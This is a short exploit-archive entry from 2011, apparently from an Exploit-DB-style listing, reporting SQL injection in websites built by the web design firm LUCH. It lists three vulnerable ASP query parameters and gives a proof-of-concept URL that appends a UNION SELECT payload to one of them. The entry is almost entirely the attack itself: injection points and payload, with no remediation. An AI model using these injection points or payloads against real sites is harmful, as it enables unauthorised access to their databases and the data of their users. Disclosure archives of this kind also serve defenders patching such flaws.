Luch Web Designer - Multiple SQL Injections

Author: p0pc0rn
type: webapps
platform: asp
port: 
date_added: 2011-03-10  
date_updated: 2011-03-10  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 16953.txt  

Title	: Web Designed by LUCH Vulnerable to SQL Injection
Vendor	: http://www.luch.co.il
Found by: p0pc0rn

SQL
---

http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]

POC
---
http://site.com/page.asp?id=23 union select 1 from test.a